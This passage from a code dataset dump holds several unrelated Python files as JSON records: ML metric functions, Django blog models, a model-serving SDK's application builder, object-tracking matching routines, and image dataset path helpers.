Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n cls: int\n class over which to calculate precision\n \"\"\"\n\n y_true = (y_true == cls).astype(int) # single class true labels\n y_pred = (y_pred == cls).astype(int) # single class predicted labels\n\n true_pos = y_true * y_pred # true positives\n false_neg = (1 - y_pred) * y_true # false negatives\n\n true_pos = np.sum(true_pos)\n false_neg = np.sum(false_neg)\n\n if true_pos + false_neg == 0.0:\n return 0.0\n\n return true_pos / (true_pos + false_neg)\n\n\ndef f1_single_class(y_true, y_pred, cls):\n \"\"\"\n F1 over a single class\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n cls: int\n class over which to calculate precision\n \"\"\"\n precision = precision_single_class(y_true, y_pred, cls)\n recall = recall_single_class(y_true, y_pred, cls)\n\n if precision + recall == 0.0:\n return 0.0\n\n return 2 * precision * recall / (precision + recall)\n\n\ndef accuracy_single_class(y_true, y_pred, cls):\n \"\"\"\n Accuracy over a single class\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n cls: int\n class over which to calculate precision\n \"\"\"\n y_true = (y_true == cls) # single class true labels\n y_pred = (y_pred == cls) # single class predicted labels\n acc = (y_true == y_pred).mean()\n return acc\n\n\ndef accuracy(y_true, y_pred):\n \"\"\"\n Accuracy\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n \"\"\"\n acc = (y_true == y_pred).mean()\n return acc\n\n\ndef f1_average(y_true, y_pred, n_classes):\n \"\"\"\n F1 average over all classes\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n n_classes: int\n total number of classes\n \"\"\"\n\n f1_scores = [f1_single_class(y_true, y_pred, i) for i in range(n_classes)]\n f1_scores = np.array(f1_scores)\n return np.sum(f1_scores) / len(f1_scores)\n\n\ndef precision_average(y_true, y_pred, n_classes):\n \"\"\"\n Precision average over all classes\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n n_classes: int\n total number of classes\n \"\"\"\n\n prec_scores = [precision_single_class(y_true, y_pred, i) for i in range(n_classes)]\n return sum(prec_scores) / len(prec_scores)\n\n\ndef recall_average(y_true, y_pred, n_classes):\n \"\"\"\n Recall average over all classes\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n n_classes: int\n total number of classes\n \"\"\"\n\n recall_scores = [recall_single_class(y_true, y_pred, i) for i in range(n_classes)]\n return sum(recall_scores) / len(recall_scores)\n\n\nclass Meter():\n def __init__(self, factor_ema=0.99, n_classes=8):\n self.factor_ema = 0.99\n self.n_classes = n_classes\n\n self.labels_true = []\n self.labels_pred = []\n\n self.metrics = {'accuracy', 'f1', 'precision', 'recall'}\n\n self.getter = {}\n self.getter['accuracy'] = lambda x, y: accuracy(x, y)\n self.getter['f1'] = lambda x, y: f1_average(x, y, self.n_classes)\n self.getter['precision'] = lambda x, y: precision_average(x, y, self.n_classes)\n self.getter['recall'] = lambda x, y: recall_average(x, y, self.n_classes)\n\n self.all = {}\n self.ema = {}\n self.total = {}\n for m in self.metrics:\n self.all[m] = []\n self.ema[m] = 0.0\n self.total[m] = 0.0\n\n self.log_ema = {}\n self.log_all = {}\n\n def add(self, labels_pred, labels_true):\n \"\"\"\n add new measurements\n \"\"\"\n if isinstance(labels_pred, torch.Tensor):\n labels_pred = labels_pred.cpu().numpy()\n if isinstance(labels_true, torch.Tensor):\n labels_true = labels_true.cpu().numpy()\n\n #\n self.labels_true.append(labels_true)\n self.labels_pred.append(labels_pred)\n\n # get metrics for batch\n for m in self.metrics:\n self.all[m].append(self.getter[m](labels_true, labels_pred))\n self.ema[m] = self.factor_ema * self.ema[m] + (1 - self.factor_ema) * self.all[m][-1]\n\n def get_metrics_total(self):\n labels_true, labels_pred = self._concat() # turn list into array\n for m in self.metrics:\n self.total[m] = self.getter[m](labels_true, labels_pred)\n return self.total\n\n def get_metrics_ema(self):\n return self.ema\n\n def get_metrics_last(self):\n return {key: val[-1] for key, val in self.all.items()}\n\n def get_metrics_all(self):\n return self.all\n\n def _concat(self):\n if isinstance(self.labels_true, list):\n labels_true = np.concatenate(self.labels_true)\n if isinstance(self.labels_pred, list):\n labels_pred = np.concatenate(self.labels_pred)\n self.labels_true = []\n self.labels_pred = []\n return labels_true, labels_pred\n\n def log(self, name, val):\n if name not in self.log_ema:\n self.log_ema[name] = val\n self.log_all[name] = [val]\n else:\n self.log_ema[name] = self.log_ema[name] * self.factor_ema + \\\n (1 - self.factor_ema) * val\n self.log_all[name].append(val)\n\n def get_log_last(self):\n return {key: val[-1] for key, val in self.log_all.items()}\n\n def get_log_ema(self):\n return self.log_ema\n\n def get_log_all(self):\n return self.log_all\n\n def get_message(self, loss=False):\n msg = \"\"\n metrics_last = self.get_metrics_last()\n metrics_ema = self.get_metrics_ema()\n # accuracy\n acc_iter = metrics_last['accuracy'] * 100\n acc_ema = metrics_ema['accuracy'] * 100\n msg += f'[ACC_ITER: {acc_iter:.2f}]'\n msg += f'[ACC_EMA: {acc_ema:.2f}]'\n # f1\n f1_iter = metrics_last['f1'] * 100\n f1_ema = metrics_ema['f1'] * 100\n msg += f'[F1_ITER: {f1_iter:.2f}]'\n msg += f'[F1_EMA: {f1_ema:.2f}]'\n\n if loss:\n log_last = self.get_log_last()\n log_ema = self.get_log_ema()\n # loss ce\n loss_ce_iter = log_last['loss_ce']\n loss_ce_ema = log_ema['loss_ce']\n msg += f'[LOSS_CE_ITER: {loss_ce_iter:.2f}]'\n msg += f'[LOSS_CE_EMA: {loss_ce_ema:.2f}]'\n # loss mu\n loss_mu_iter = log_last['loss_mu']\n loss_mu_ema = log_ema['loss_mu']\n msg += f'[LOSS_MU_ITER: {loss_mu_iter:.2f}]'\n msg += f'[LOSS_MU_EMA: {loss_mu_ema:.2f}]'\n # loss center\n loss_center_iter = log_last['loss_center']\n loss_center_ema = log_ema['loss_center']\n msg += f'[LOSS_CENTER_ITER: {loss_center_iter:.2f}]'\n msg += f'[LOSS_CENTER_EMA: {loss_center_ema:.2f}]'\n\n return msg\n\n\nif __name__ == '__main__':\n m = Meter(n_classes=2)\n a = np.array([1, 1, 1])\n b = np.array([1, 1, 0])\n m.add(a, b)\n m.add(a, b)\n m.add(a, b)\n m.add(a, b)\n m.add(a, a)\n print(m.get_metrics_last())\n print(m.get_metrics_ema())\n print(m.get_metrics_total())\n","repo_name":"takihasan/ARBEx","sub_path":"arbex/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":8451,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"69867022842","text":"import datetime\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom ckeditor_uploader.fields import RichTextUploadingField\n\n\nREQUEST_CHOICES = (\n ('api', 'api'),\n ('template', 'template')\n)\nDEGREE = (\n ('metric', 'Metriculate'),\n ('inter', 'Intermediate'),\n ('grad', 'Graduation'),\n ('pg', 'Post-Graduation'),\n ('dr', 'doctorate'),\n)\nYEAR_CHOICES = [(r, r) for r in range(1950, datetime.date.today().year + 5)]\nRATING_CHOICES = [(r, r) for r in range(0, 101)]\n\n\nclass User(AbstractUser):\n is_editor = models.BooleanField(default=False)\n is_chief = models.BooleanField(default=False)\n\n\nclass Post(models.Model):\n owner = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='posts'\n )\n title = models.CharField(max_length=255)\n text = RichTextUploadingField()\n created_date = models.DateTimeField(auto_now_add=True)\n published_date = models.DateTimeField(auto_now_add=True)\n is_approve = models.BooleanField(default=False)\n is_deleted = models.BooleanField(default=False)\n request_from = models.CharField(\n max_length=10,\n choices=REQUEST_CHOICES,\n default='template'\n )\n\n def __str__(self):\n return self.title\n\n def delete(self):\n self.is_deleted = True\n self.save()\n\n def save(self, *args, **kwargs):\n self.full_clean() # performs regular validation then clean()\n super(Post, self).save(*args, **kwargs)\n\n def clean(self):\n self.text = self.text.strip()\n\n class Meta:\n ordering = [\"-created_date\"]\n\n\nclass Editor(models.Model):\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n primary_key=True\n )\n\n def __str__(self):\n return self.user\n\n\nclass Comment(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='comment'\n )\n blog = models.ForeignKey(Post, on_delete=models.CASCADE)\n comment = models.TextField()\n comment_datetime = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-comment_datetime']\n\n\nclass Reply(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='reply'\n )\n blog = models.ForeignKey(Post, on_delete=models.CASCADE)\n which_comment = models.ForeignKey(Comment, on_delete=models.CASCADE)\n reply = models.TextField()\n reply_datetime = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-reply_datetime']\n","repo_name":"ashshakya/Confession","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9856763572","text":"from enum import Enum\nfrom typing import List, Optional, Dict\nimport json\nimport datetime\n\nimport sseclient\nfrom google.protobuf.json_format import MessageToDict\n\nfrom hydro_serving_grpc.serving.contract.signature_pb2 import ModelSignature\n\nfrom hydrosdk.cluster import Cluster\nfrom hydrosdk.signature import signature_dict_to_ModelSignature\nfrom hydrosdk.data.types import PredictorDT\nfrom hydrosdk.deployment_configuration import DeploymentConfiguration\nfrom hydrosdk.modelversion import ModelVersion\nfrom hydrosdk.predictor import PredictServiceClient, MonitorableApplicationPredictionService\nfrom hydrosdk.utils import handle_request_error\nfrom hydrosdk.exceptions import TimeoutException\nfrom pydantic import BaseModel\n\nclass StreamingParams(BaseModel):\n sourceTopic: str\n destinationTopic: str\n\nclass ModelVariant(BaseModel):\n modelVersionId: int\n weight: int\n deploymentConfigurationName: Optional[str]\n servableName: Optional[str]\n\n\nclass ApplicationStatus(Enum):\n FAILED = 0\n ASSEMBLING = 1\n READY = 2\n\n\nclass Application:\n \"\"\"\n Applications are used to combine your ModelVersions into a linear graph and deploy \n it into production, exposing HTTP and gRPC interfaces for consumers.\n\n Use ApplicationBuilder class to create a new Application in your Hydrosphere cluster\n or an Application.find method to get the existing Application.\n\n :Example:\n\n List all applications created on the cluster.\n\n >>> from hydrosdk.cluster import Cluster \n >>> cluster = Cluster(\"http-cluster-endpoint\")\n >>> apps = Application.list(cluster)\n >>> for app in apps: \n >>> print(app)\n\n Find an application by name and perform a prediction from it.\n\n >>> from hydrosdk.cluster import Cluster\n >>> cluster = Cluster(\"http-cluster-endpoint\", \"grpc-cluster-endpoint\") # important to use a gRPC endpoint \n >>> app = Application.find(cluster, \"my-application\")\n >>> pred = app.predictor()\n >>> resp = pred.predict({\"my-input\": 1})\n \"\"\"\n _BASE_URL = \"/api/v2/application\"\n\n @staticmethod\n def list(cluster: Cluster) -> List['Application']:\n \"\"\"\n List all available applications from the cluster.\n\n :param cluster: active cluster\n :return: deserialized list of application objects\n \"\"\"\n resp = cluster.request(\"GET\", Application._BASE_URL)\n handle_request_error(\n resp, f\"Failed to list all applications. {resp.status_code} {resp.text}\")\n applications = [Application._from_json(cluster, app_json)\n for app_json in resp.json()]\n return applications\n\n @staticmethod\n def find(cluster: Cluster, application_name: str) -> 'Application':\n \"\"\"\n Search for an application by name. \n\n :param cluster: active cluster\n :param application_name: application name\n :return: deserialized application object\n \"\"\"\n resp = cluster.request(\"GET\", f\"{Application._BASE_URL}/{application_name}\")\n handle_request_error(\n resp, f\"Failed to find an application by name={application_name}. {resp.status_code} {resp.text}\")\n return Application._from_json(cluster, resp.json())\n\n @staticmethod\n def delete(cluster: Cluster, application_name: str) -> dict:\n \"\"\"\n Delete an application by name.\n\n :param cluster: active cluster\n :param application_name: application name\n :return: response from the cluster\n \"\"\"\n resp = cluster.request(\"DELETE\", f\"{Application._BASE_URL}/{application_name}\")\n handle_request_error(\n resp, f\"Failed to delete application for name={application_name}. {resp.status_code} {resp.text}\")\n return resp.json()\n\n @staticmethod\n def _from_json(cluster: Cluster, application_json: dict) -> 'Application':\n \"\"\"\n Deserialize json into application object. \n\n :param cluster: active cluster\n :param application_json: input json with application object fields\n :return: application object\n \"\"\"\n id_ = application_json.get(\"id\")\n name = application_json.get(\"name\")\n execution_graph = ExecutionGraph._from_json(cluster, application_json.get(\"executionGraph\"))\n kafka_streaming = [StreamingParams(sourceTopic=kafka_param[\"in-topic\"], destinationTopic=kafka_param[\"out-topic\"])\n for kafka_param in application_json.get(\"kafkaStreaming\")]\n metadata = application_json.get(\"metadata\")\n message = application_json.get(\"message\")\n signature = signature_dict_to_ModelSignature(data=application_json.get(\"signature\"))\n status = ApplicationStatus[application_json.get(\"status\").upper()]\n\n app = Application(cluster=cluster,\n id=id_,\n name=name,\n execution_graph=execution_graph,\n status=status,\n signature=signature,\n kafka_streaming=kafka_streaming,\n metadata=metadata,\n message=message)\n return app\n\n def lock_while_starting(self, timeout: int = 120) -> 'Application':\n \"\"\" Wait for an application to become ready. \"\"\"\n events_stream = self.cluster.request(\"GET\", \"/api/v2/events\", stream=True)\n events_client = sseclient.SSEClient(events_stream)\n\n self.status = self.find(self.cluster, self.name).status\n if self.status is ApplicationStatus.READY: \n return self\n if self.status is ApplicationStatus.FAILED:\n raise ValueError(f'Application initialization failed {self.message}')\n try:\n deadline_at = datetime.datetime.now().timestamp() + timeout\n for event in events_client.events():\n if datetime.datetime.now().timestamp() > deadline_at:\n raise TimeoutException('Time out waiting for an application to become available')\n if event.event == \"ApplicationUpdate\":\n data = json.loads(event.data)\n print(data)\n if data.get(\"name\") == self.name:\n self.status = ApplicationStatus[data.get(\"status\").upper()]\n if self.status is ApplicationStatus.READY:\n return self\n elif self.status is ApplicationStatus.FAILED:\n raise ValueError('Application initialization failed')\n finally:\n events_client.close()\n\n def predictor(self, return_type=PredictorDT.DICT_NP_ARRAY) -> PredictServiceClient:\n \"\"\"\n Return a predictor object which is used to transform your data\n into a proto message, pass it via gRPC to the cluster and decode\n the cluster output from proto to a dict with Python dtypes.\n\n :param return_type: Specifies into which format should predictor serialize model output.\n Numpy dtypes, Python dtypes or pd.DataFrame are supported.\n :return: PredictServiceClient with .predict() method which accepts your data\n \"\"\"\n impl = MonitorableApplicationPredictionService(channel=self.cluster.channel, target=self.name)\n return PredictServiceClient(impl=impl, signature=self.signature, return_type=return_type)\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"signature\": MessageToDict(self.signature),\n \"execution_graph\": self.execution_graph.to_dict(),\n \"metadata\": self.metadata,\n \"message\": self.message,\n \"status\": self.status.name,\n }\n \n def __init__(self, cluster: Cluster, id: int, name: str, execution_graph: 'ExecutionGraph',\n status: ApplicationStatus, signature: ModelSignature,\n kafka_streaming: List[StreamingParams],\n metadata: Optional[Dict[str, str]] = None,\n message: Optional[str] = None) -> 'Application':\n \"\"\"\n :param cluster: active cluster\n :param id: unique application ID\n :param name: application Name\n :param signature: signature, specifying input and output fields names, dtypes and shapes\n :param execution_graph: linear graph which specifies ExecutionStages which sequentially transform input\n :param status: Application Status\n :param kafka_streaming: list of Kafka parameters with input and output Kafka topics specified\n :param metadata: metadata with string keys and string values.\n :param message: possible error message from the cluster\n \"\"\"\n self.id = id\n self.name = name\n self.execution_graph = execution_graph\n self.kafka_streaming = kafka_streaming\n self.metadata = metadata\n self.status = status\n self.signature = signature\n self.cluster = cluster\n self.message = message\n\n def __str__(self):\n return f\"Application {self.id} {self.name}\"\n\n\nclass ApplicationBuilder:\n \"\"\"\n ApplicationBuilder is used to create new Applications in your cluster.\n\n :Example:\n \n Create an application from existing modelversions.\n\n >>> from hydrosdk import Cluster, ModelVersion\n >>> cluster = Cluster('http-cluster-endpoint')\n >>> mv1 = ModelVersion.find(cluster, \"my-model\", 1)\n >>> mv2 = ModelVersion.find(cluster, \"my-model\", 2)\n >>> stage = ExecutionStageBuilder() \\\n .with_model_variant(mv1, 50) \\\n .with_model_variant(mv2, 50) \\ \n .build()\n >>> app = ApplicationBuilder(\"my-application-ab-test\") \\\n .with_stage(stage) \\\n .build(cluster)\n \"\"\"\n\n def __init__(self, name: str) -> 'ApplicationBuilder':\n \"\"\"\n :param cluster: Hydrosphere cluster where you want to create an Application\n :param name: Future Application name\n \"\"\"\n self.name = name\n self.stages = []\n self.metadata = {}\n self.streaming_parameters = []\n\n def with_stage(self, stage: 'ExecutionStage') -> 'ApplicationBuilder':\n \"\"\"\n Add an ExecutionStage to your Application. See ExecutionStage for more information.\n\n :param stage:\n :return:\n \"\"\"\n self.stages.append(stage)\n return self\n\n def with_metadata(self, key: str, value: str) -> 'ApplicationBuilder':\n \"\"\"\n Add a metadata value to your future Application.\n\n :param key: string key under which `value` will be stored\n :param value: string value\n :return:\n \"\"\"\n self.metadata[key] = value\n return self\n\n def with_metadatas(self, metadata: Dict[str, str]) -> 'ApplicationBuilder':\n \"\"\"\n Add a metadata to your future Application.\n\n :param metadata: a dict containing metadata for your application\n :return:\n \"\"\"\n self.metadata.update(metadata)\n return self\n\n def with_kafka_params(self, source_topic: str, dest_topic: str) -> 'ApplicationBuilder':\n \"\"\"\n Add a kafka parameters to your Application.\n\n :param source_topic: source Kafka topic\n :param dest_topic: destination Kafka topic\n :return:\n \"\"\"\n params = StreamingParams(sourceTopic=source_topic, destinationTopic=dest_topic)\n self.streaming_parameters.append(params)\n return self\n\n def build(self, cluster: Cluster) -> Application:\n \"\"\"\n Create an Application in your Hydrosphere cluster.\n\n :return: Application object\n \"\"\"\n if not self.stages:\n raise ValueError(\"No execution stages were provided\")\n\n execution_graph = ExecutionGraph(stages=self.stages)\n application_json = {\"name\": self.name,\n \"kafkaStreaming\": [sp.to_dict() for sp in self.streaming_parameters],\n \"executionGraph\": execution_graph.to_dict(),\n \"metadata\": self.metadata}\n\n resp = cluster.request(\"POST\", Application._BASE_URL, json=application_json)\n handle_request_error(\n resp, f\"Failed to create an application {self.name}. {resp.status_code} {resp.text}\")\n return Application._from_json(cluster, resp.json())\n\n\nclass ExecutionGraph:\n def __init__(self, stages: List['ExecutionStage']) -> 'ExecutionGraph':\n \"\"\"\n ExecutionGraph is a representation of a linear graph which is used\n by Hydrosphere to create pipelines of ModelVersions. This linear graph\n consists of ExecutionStages following each other. See ExecutionStage to learn more.\n\n :param stages: list of ExecutionStages used to sequentially transform input.\n \"\"\"\n self.stages = stages\n\n def to_dict(self) -> Dict[str, List]:\n return {\"stages\": [s.to_dict() for s in self.stages]}\n\n @staticmethod\n def _from_json(cluster: Cluster, ex_graph_dict: Dict) -> 'ExecutionGraph':\n return ExecutionGraph([ExecutionStage._from_json(cluster, stage)\n for stage in ex_graph_dict['stages']])\n\n\nclass ExecutionStage:\n def __init__(self, model_variants: List[ModelVariant], signature: Optional[ModelSignature]) -> 'ExecutionStage':\n \"\"\"\n ExecutionStage is a single stage in a linear graph of ExecutionGraph. Each stage\n may contain from 1 to many different ModelVersions with the same signature. Every input\n requested routed to this stage will be automatically shadowed to all ModelVersions inside\n of it. Stage output response will be selected according to the relative weights associated \n with each version.\n\n :param model_variants: list of ModelVersions with corresponding weights\n :param signature: signature specifying input and output field names, data types and shapes.\n \"\"\"\n self.signature = signature\n self.model_variants = model_variants\n\n def to_dict(self) -> Dict[str, List[Dict[str, int]]]:\n model_variants = []\n for model_variant in self.model_variants:\n dict_repr = {\n 'modelVersionId': model_variant.modelVersionId,\n 'weight': model_variant.weight,\n 'deploymentConfigName': model_variant.deploymentConfigurationName,\n }\n model_variants.append(dict_repr)\n return {\"modelVariants\": model_variants}\n\n @staticmethod\n def _from_json(cluster: Cluster, execution_stage_dict: Dict) -> 'ExecutionStage':\n execution_stage_signature = signature_dict_to_ModelSignature(execution_stage_dict['signature'])\n model_variants = [ModelVariant.parse_obj(mv) for mv in execution_stage_dict['modelVariants']]\n return ExecutionStage(model_variants=model_variants, signature=execution_stage_signature)\n\n\nclass ExecutionStageBuilder:\n def __init__(self) -> 'ExecutionStageBuilder':\n \"\"\"\n Builder class to help building ExecutionStage.\n \"\"\"\n self.model_variants = []\n\n def __validate(self):\n \"\"\"\n Validate the stage for correctness.\n \"\"\"\n if len(self.model_variants) == 0:\n raise ValueError(\"At least one model variant should be specified.\")\n\n if sum(variant.weight for variant in self.model_variants) != 100:\n raise ValueError(\"All model variants' weights inside the same stage must sum up to 100\")\n\n def with_model_variant(self, model_version: ModelVersion,\n weight: int,\n deployment_configuration: Optional[DeploymentConfiguration] = None) -> 'ExecutionStageBuilder':\n \"\"\"\n Add a ModelVersion with a weight to an ExecutionStage.\n \n :param model_version: ModelVersion to which input requests will be shadowed\n :param weight: Weight which affects the chance of choosing a model output as an\n output of an ExecutionStage\n :param deployment_configuration: K8s Deployment Configuration of this Model Variant\n :return:\n \"\"\"\n dc_name = None\n if deployment_configuration is not None:\n dc_name = deployment_configuration.name\n mv = ModelVariant(\n modelVersionId=model_version.id,\n weight=weight,\n deploymentConfigurationName=dc_name,\n servableName=None\n )\n self.model_variants.append(mv)\n return self\n\n def build(self) -> 'ExecutionStage':\n \"\"\"\n Verify that all ModelVersions inside an ExecutionStage have the same signature\n and finally creates an ExecutionStage.\n\n :return:\n \"\"\"\n self.__validate()\n return ExecutionStage(model_variants=self.model_variants, signature=None)\n","repo_name":"Hydrospheredata/hydro-serving-sdk","sub_path":"hydrosdk/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":16854,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"73983839479","text":"import numpy as np\nfrom scipy.spatial.distance import cdist\nimport lap\nfrom minitrack.utils.np_util import np_box_iou\nfrom .kalman_filter import chi2inv95\n\n\ndef min_cost_matching(distance_metric, thresh, tracks, detectobjs, track_indices=None,detection_indices=None):\n if track_indices is None:\n track_indices = list(range(len(tracks)))\n if detection_indices is None:\n detection_indices = list(range(len(detectobjs)))\n\n if len(detection_indices) == 0 or len(track_indices) == 0:\n return [], track_indices, detection_indices # Nothing to match.\n\n cost_matrix = distance_metric(tracks, detectobjs, track_indices, detection_indices)\n _, row_indices, col_indices = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)\n\n track_indices = np.asarray(track_indices)\n detection_indices = np.asarray(detection_indices)\n unmatched_tracks = track_indices[np.where(row_indices<0)[0]].tolist()\n unmatched_detections = detection_indices[np.where(col_indices < 0)[0]].tolist()\n \n matches=[]\n for irow, icol in enumerate(row_indices):\n if icol >= 0:\n track_idx = track_indices[irow]\n detection_idx = detection_indices[icol]\n if cost_matrix[irow, icol] > thresh:\n unmatched_tracks.append(track_idx)\n unmatched_detections.append(detection_idx)\n else:\n matches.append((track_idx, detection_idx))\n\n #print('unmatched_detections',unmatched_detections)\n return matches, unmatched_tracks, unmatched_detections\n\ndef matching_cascade(distance_metric, thresh, cascade_depth, tracks, detections,track_indices=None, detection_indices=None):\n if track_indices is None:\n track_indices = list(range(len(tracks)))\n if detection_indices is None:\n detection_indices = list(range(len(detections)))\n\n unmatched_detections = detection_indices\n matches = []\n\n for level in range(cascade_depth):\n if len(unmatched_detections) == 0: # No detections left\n break\n track_indices_l = [k for k in track_indices if tracks[k].time_since_update == 1 + level]\n if len(track_indices_l) == 0: # Nothing to match at this level\n continue\n matches_l, _, unmatched_detections = min_cost_matching(distance_metric, thresh, tracks, detections,track_indices_l, unmatched_detections)\n matches += matches_l\n\n unmatched_tracks = list(set(track_indices) - set(k for k, _ in matches))\n return matches, unmatched_tracks, unmatched_detections\n\ndef iou_cost(tracks, detections, track_indices,detection_indices):\n\n det_ltrb = np.array([detections[i].ltrb for i in detection_indices])\n track_ltrb = np.array([tracks[i].ltrb for i in track_indices])\n\n ious=np_box_iou(track_ltrb,det_ltrb)\n cost_ious=1-ious\n return cost_ious\n\ndef embedding_cost(tracks, detections, track_indices,detection_indices):\n det_feat = np.array([detections[i].feature for i in detection_indices])\n track_feat = np.array([tracks[i].smooth_feat for i in track_indices])\n cost_matrix = np.maximum(0.0, cdist(track_feat, det_feat))\n # cdist函数这里默认是欧式距离\n # 因为这里embedding在前向传播时经过了F.normalize,所以欧式距离等于1-cosine\n return cost_matrix\n\ndef gate_cost_funct(kf,cost_matrix,tracks,detections,track_indices,detection_indices,only_position=False,lambda_=0.98):\n gating_dim = 2 if only_position else 4\n gating_threshold = chi2inv95[gating_dim]\n measurements = np.asarray([detections[i].xyah for i in detection_indices])\n for row, track_idx in enumerate(track_indices):\n # gating_distance是马氏距离\n # cost_matric是外貌特征\n track = tracks[track_idx]\n gating_distance = kf.gating_distance(track.mean, track.covariance, measurements, only_position,metric='maha')\n cost_matrix[row, gating_distance > gating_threshold] = np.inf\n cost_matrix[row] = lambda_ * cost_matrix[row] + (1 - lambda_) * gating_distance\n return cost_matrix\n\n\n\n\n","repo_name":"Bilibilee/minitrack","sub_path":"minitrack/tracker/utils/matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24132039340","text":"\"\"\"\nHelper functions for loading and using datasets.\n\nAllows the main script to be launched directly by command line, or via an IDE\n\"\"\"\n\nimport glob\nimport random\nimport os\nimport numpy as np\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\nimport re # Regex for path scrubbing\nimport pickle # For load/save of random state\nimport random\n\n# Normalization parameters for pre-trained PyTorch models\nmean = np.array([0.485, 0.456, 0.406])\nstd = np.array([0.229, 0.224, 0.225])\n\n\nclass ImageDataset(Dataset): # Creates a map-style dataset\n def __init__(self, root, hr_shape):\n hr_height, hr_width = hr_shape\n # Transforms for low resolution images and high resolution images\n self.lr_transform = transforms.Compose(\n [\n transforms.Resize((hr_height // 4, hr_height // 4), Image.BICUBIC),\n transforms.ToTensor(),\n transforms.Normalize(mean, std),\n ]\n )\n self.hr_transform = transforms.Compose(\n [\n transforms.Resize((hr_height, hr_height), Image.BICUBIC),\n transforms.ToTensor(),\n transforms.Normalize(mean, std),\n ]\n )\n\n self.files = sorted(glob.glob(root + \"/*.*\"))\n\n def __getitem__(self, index):\n img = Image.open(self.files[index % len(self.files)])\n img_lr = self.lr_transform(img)\n img_hr = self.hr_transform(img)\n\n return {\"lr\": img_lr, \"hr\": img_hr}\n\n def __len__(self):\n return len(self.files)\n\n\n\nclass ImageLoader(Dataset): # Creates a map-style dataset\n def __init__(self, root):\n\n self.identityTransform = transforms.Compose(\n [ \n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n\n self.files = sorted(glob.glob(root + \"/*.*\"))\n\n def __getitem__(self, index):\n img = Image.open(self.files[index % len(self.files)])\n\n img = self.identityTransform(img)\n\n return {\"img\": img}\n\n\n def __len__(self):\n return len(self.files)\n\n\ndef GetDataPath(dataset_name):\n \"\"\"\n Helper function: Allow launching of the script from the project root directory (ie. within an IDE)\n\n Returns ../../data/DATASET_NAME, or ./data/DATASET_NAME, as appropriate\n \"\"\"\n # Try from the implementation directory:\n dataPath = \"../../data/%s\" % dataset_name\n if not os.path.isdir(dataPath):\n # Try from the project root:\n dataPath = \"./data/%s\" % dataset_name\n if not os.path.isdir(dataPath):\n print(\"Error: Valid data path not found!\")\n\n return dataPath\n\n\ndef GetModelPath():\n \"\"\"\n Helper function: Get the relative /saved_models/ path\n\n Returns ../../saved_models/, or ./saved_models/, as appropriate\n \"\"\"\n # Try from the implementation directory:\n modelPath = \"../../saved_models/\"\n if not os.path.isdir(modelPath):\n # Try from the project root:\n modelPath = \"./saved_models/\"\n if not os.path.isdir(modelPath):\n print(\"Error: Valid model path not found!\")\n\n return modelPath\n\n\ndef GetImagesPath():\n \"\"\"\n Helper function: Get the relative /images/ path\n\n Returns ../../images/, or ./images/, as appropriate\n \"\"\"\n # Try from the implementation directory:\n imagesPath = \"../../images/\"\n if not os.path.isdir(imagesPath):\n # Try from the project root:\n imagesPath = \"./images/\"\n if not os.path.isdir(imagesPath):\n print(\"Error: Valid images path not found!\")\n\n return imagesPath\n\n\ndef GetArbitraryPath(thePath):\n \"\"\"\n Helper function: Get a relative arbitrary path\n\n Returns ../../thePath/, or ./thePath/, as appropriate\n \"\"\"\n # Try from the implementation directory:\n arbitraryPath = \"../../\" + thePath + \"/\"\n if not os.path.isdir(arbitraryPath):\n # Try from the project root:\n arbitraryPath = \"./\" + thePath + \"/\"\n if not os.path.isdir(arbitraryPath):\n print(\"Error: Valid path not found!\")\n\n return arbitraryPath\n\n\ndef GetHighestWeightIndex():\n \"\"\"\n Helper function: Get the index of the highest weights file in the /saved_models directory\n \"\"\"\n dataPath = GetModelPath()\n\n return GetHighestWeightIndexUsingPath(dataPath)\n\n\ndef GetHighestWeightIndexUsingPath(dataPath):\n \"\"\"\n Helper function: Get the index of the highest weights file in the /saved_models directory.\n\n For efficiency, use this function if you've already got a copy of the current /saved_models directory\n \"\"\"\n\n highestIndex = max([int(re.sub('[^0-9]','', f)) for f in os.listdir(dataPath)])\n\n return highestIndex\n\n\ndef GetModelDataPath(modelType, epoch = -1):\n \"\"\"\n Helper function: Get the correct relative path of the saved model weights/biases\n\n modelType = \"generator\" or \"discriminator\" (defaults to generator if errors occur)\n epoch = Specific epoch to load. Loads the max if no valid epoch is supplied\n \"\"\"\n\n dataPath = GetModelPath()\n \n # If no valid epoch is supplied, get the max:\n if epoch < 0:\n epoch = GetHighestWeightIndexUsingPath(dataPath)\n\n dataName = \"generator_\" + str(epoch) + \".pth\"\n if modelType == \"discriminator\":\n dataName = \"discriminator_\" + str(epoch) + \".pth\"\n\n finalPath = dataPath + dataName\n\n print(\"Using saved model path: \\\"\" + finalPath + 